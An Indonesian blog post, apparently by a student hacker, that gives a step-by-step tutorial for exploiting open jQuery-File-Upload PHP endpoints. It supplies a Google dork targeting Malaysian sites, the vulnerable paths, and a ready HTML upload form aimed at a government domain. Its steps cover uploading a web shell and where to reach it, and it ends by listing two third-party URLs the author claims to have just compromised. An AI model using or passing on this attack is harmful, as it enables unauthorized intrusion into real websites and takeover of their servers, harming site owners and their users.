dah lama ya mimin gak update ,yu no lah kan anak SMK gimana tugasnya :v.
dah,langsung aja ke TKP ,
Bahan-Bahan:
1.Default google dork : /assets/global/plugins/jquery-file-upload/ site:my (Kembangin lagi biar joss)
2.Exploit: http://target/assets/global/plugins/jquery-file-upload/server/php/ atau
http://target/[Patch]/assets/global/plugins/jquery-file-upload/server/php/ .
3.Script CSRF: Save dengan .html
<form method="POST" action="http://target.gov.my/public/templates/skin/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
4. Shell: pakek shell andalan kalian ^_^
Langkah-Langkah:
1.Masukan dork di atas atau dork yang sudah ente kembangin ,pilih target lalu masukan exploitnya,
jika vuln makan ada tulisan seperti ini: {"files":[{}] Atau {"files":[{blablablablabla}]
2.Masukan target anda ke script CSRF tadi .
3.Upload shell anda jika berhasil ada tampilan seperti ini:
4. Akses shell ada di : http://target.gov.my/assets/global/plugins/jquery-file-upload/server/php/files/namashell.php
Noh upload shell mimin berhasil :v
nih barusan mimin dapat 2 yang sukses kena tusbol :v
http://dammam2015.org/x.php
http://www.abaza-auto.net/Index.php
Oke sekian semoga berhasil ^_^
sumber: http://www.xdigitalmedia.my.id/
sumber: http://www.xdigitalmedia.my.id/
Tidak ada komentar:
Posting Komentar